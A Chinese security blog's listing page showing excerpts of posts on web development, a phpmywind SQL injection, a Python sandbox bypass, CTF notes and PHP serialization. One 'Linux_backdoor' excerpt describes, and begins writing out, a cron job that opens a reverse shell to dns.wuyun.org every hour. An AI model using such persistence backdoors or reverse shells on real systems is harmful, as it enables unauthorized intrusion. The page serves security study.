会员
周边
众包
新闻
博问
闪存
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
l3m0n
首页
管理
订阅
随笔- 3 文章- 119 评论- 57 阅读-
31万
上一页
1
···
7
8
9
10
11
12
13
下一页
2016年7月3日
jsp电商开发笔记
摘要: 感谢bootstrap... 结构 本次未用到其他框架,单纯的理解一下开发模式,与mvc相比,个人在jsp中理解这个模式是: servlet做控制层,javabean做model层,前面的jsp则是view层 大概流程 访问 过滤器 jsp servlet javabean servlet jsp
阅读全文
posted @ 2016-07-03 22:19 l3m0n
阅读(1093)
评论(0)
推荐(0)
2016年6月21日
如何在shell下自动获取回收站内所有的文件信息
摘要: 师傅提的一个问题,感觉不错,渗透时候需要的就是收集更多信息。 http://zone.wooyun.org/content/27961 已知: 可查询回收站内存储的被删除文件 可查看回收站内存储的被删除文件的路径信息 1、powershell实现: 2、exe实现 https://github.co
阅读全文
posted @ 2016-06-21 12:15 l3m0n
阅读(1102)
评论(0)
推荐(0)
2016年6月17日
phpmywind最新版sql注入以及后台目录遍历和文件读取
摘要: 最新版本 5.3 看wooyun厂商这忽略的架势就觉得是有点放弃治疗的想法啊。 前台会员注入 分析 http://www.wooyun.org/bugs/wooyun-2015-0117008 我看了一下最新版还有这个注入,而作者给的exp有坑处。 这是一个完善账号的功能,在核心文件里面,这个程序用
阅读全文
posted @ 2016-06-17 22:25 l3m0n
阅读(3425)
评论(1)
推荐(0)
2016年5月29日
blog开发记录
摘要: 前言 算是在完成作业的前提下花了6天弄完,功能少而且存在大量bug以及安全问题,主要是练习mvc框架的构思,也算是第一次从前端设计到框架构写再到后端逻辑处理。记录一下遇到的坑点。 前端:bootstrap + jquery 后端:php 数据库:mysql 开发时的运行环境:phpstudy + w
阅读全文
posted @ 2016-05-29 13:57 l3m0n
阅读(527)
评论(0)
推荐(0)
2016年5月20日
python编码问题
摘要: win下的Dos乱码 utf 8保存的文件,在win中映射为gbk,输出文字就是乱码的,或者读取网页的时候在dos下输出,因为dos是用gbk编码,这样就容易导致出错 解决办法: 另外还有一种情况是一些软件(notepad)在保存utf 8会在文件开头插入不可见字符 可以用codecs模块来处理 p
阅读全文
posted @ 2016-05-20 16:19 l3m0n
阅读(367)
评论(0)
推荐(0)
2016年5月14日
python_eval_and_bypass_sandbox_study
摘要: __builtin__与__builtins__的区别与关系 python有一个内建模块,该模块会在python启动后,但在没有执行python代码前,会被加载到内存.即可用调用里面的函数,其中python2.x中是 ,python3.x中更名为 输出 即在python代码中我们可以直接使用这些函数
阅读全文
posted @ 2016-05-14 22:20 l3m0n
阅读(2292)
评论(2)
推荐(0)
2016年5月13日
Linux_backdoor
摘要: Linux权限维持 前言 并未深入研究backdoor是怎么写的,只是研究一下网上存在的几种后门的用法。 测试环境:centos 6.5 crontab 计划任务,永远的爱 每60分钟反弹一次shell给dns.wuyun.org的53端口 (crontab l;printf " /60 exec
阅读全文
posted @ 2016-05-13 12:49 l3m0n
阅读(1900)
评论(0)
推荐(0)
2016年5月9日
sctf2016_sycshell出题小结
摘要: 0x01 tip: 对于企业那种,可能会在源码中看到一些虚拟主机配置后,在内网里面是使用hosts,由于没对其进行限制,可导致外网访问其内容 即修改一下本地的hosts: 0x02 tip: "jsfuck下载" 直接运行时弹框: /NO TIP/ 他的函数运行规则是,所以重在这个函数体 jsfuc
阅读全文
posted @ 2016-05-09 19:51 l3m0n
阅读(1262)
评论(0)
推荐(0)
dns/http_log
摘要: 上计算机网络课的时候并没怎么认真听啊,导致都是很懵逼的状态,记录一下。 dns请求是通过udp实现,http请求是通过tcp完成 通过这点就可以利用套接字来实现一个小小的cloudeye http_dns_log: 一般用python自带的去接收请求log 利用 判断: 本文来自:http://zo
阅读全文
posted @ 2016-05-09 19:38 l3m0n
阅读(445)
评论(0)
推荐(0)
2016年4月19日
php序列化
摘要: [TOC] 1. 基础 1.1 什么是序列化 序列化是对象串行化,对象是一种在内存中存储的数据类型,寿命是随生成该对象的程序的终止而终止,为了持久使用对象的状态,将其通过serialize()函数进行序列化为一行字符串保存为文件,使用时再用unserialize()反序列化为对象 序列化后的格式:
阅读全文
posted @ 2016-04-19 00:55 l3m0n
阅读(5544)
评论(3)
推荐(0)
上一页
1
···
7
8
9
10
11
12
13
下一页
公告
Welcome To My Blog!!!
昵称:
l3m0n
园龄:
9年10个月
粉丝:
235
关注:
6
+加关注
搜索
积分与排名
积分 - 218835
排名 - 5415
文章分类
(123)
ctf(34)
linux(2)
other(8)
web安全(13)
安全运维(6)
编程开发(7)
代码审计(27)
甲方安全(1)
内网渗透(4)
逆向工程(4)
区块链(1)
渗透测试(11)
实用工具(5)
文章档案
(119)
2019年9月(1)
2019年7月(2)
2019年5月(1)
2019年4月(1)
2019年2月(1)
2019年1月(4)
2018年12月(1)
2018年11月(3)
2018年10月(2)
2018年9月(2)
2018年8月(1)
2018年7月(1)
2018年6月(1)
2018年5月(1)
2018年4月(8)
2018年3月(3)
2018年2月(2)
2018年1月(3)
2017年12月(1)
2017年11月(2)
2017年9月(3)
2017年8月(3)
2017年7月(3)
2017年6月(2)
2017年5月(5)
2017年4月(6)
2017年3月(4)
2017年2月(3)
2017年1月(3)
2016年12月(6)
2016年11月(8)
2016年10月(4)
2016年9月(1)
2016年8月(3)
2016年7月(3)
2016年6月(2)
2016年5月(6)
2016年4月(2)
2016年2月(1)
2016年1月(1)
2015年12月(1)
2015年11月(2)
2015年9月(4)
2015年8月(2)
更多
Blog_Link
七友
Wupco
从容师傅
Bendawang
Veneno
乐清小俊杰
Bsmali4
Sco4x0
Tomato
Phithon
Mosuan
0xmuhe
Jas0n
Symbo1 Team
Clay
K1n9
TimeMage
Syclover
Swing
Virink
Godot
Homaebic
BerTrAM
咸鱼大黑阔
李三
姜牛
更多
阅读排行榜
1. 关于我(4433)
2. 超赞网络资源总结(1911)
3. Book List(1505)
>
最新评论
1. Re:从底层分析eval和assert的区别
半懂
--CVE-柠檬i
2. Re:渗透学习
大哥,那些视频都没有了 还能整点新的东西不
--啊柒
3. Re:Linux信息自动化收集
程序被删了?
--ee博客
4. Re:毕业设计之php RASP(三) 收尾
@l3m0n 解决了,谢谢...
--study12
5. Re:毕业设计之php RASP(三) 收尾
@study12 把代码拷贝,重新定义一个函数,之后使用调用这个函数即可。...
--l3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
点击右上角即可分享